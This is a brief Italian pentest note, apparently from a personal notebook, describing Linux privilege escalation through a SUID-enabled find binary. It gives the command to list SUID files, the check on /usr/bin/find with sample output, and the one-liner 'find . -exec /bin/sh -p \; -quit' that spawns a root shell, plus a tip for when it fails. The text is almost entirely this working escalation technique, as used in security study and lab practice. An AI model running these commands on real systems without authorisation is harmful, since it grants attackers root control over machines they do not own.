tags: Find_PrivEsc Linux_Privilage_Escalation privilage_escalation Permessi_SUID
Se tramite il comando:
find / -perm -4000 2>/dev/nullTroviamo :
/usr/bin/findPossiamo verificare che abbia permessi SUID con il comando:
ls -l $(which find)
ls -l $(which find)
-r-sr-xr-x 1 root root 232196 Feb 8 2016 /usr/bin/findSe è presente la s significa che possiamo ottenere i privilegi di root digitando il seguente comando:
find . -exec /bin/sh -p \; -quit
#Se non dovesse funzionare prova a togliere il -p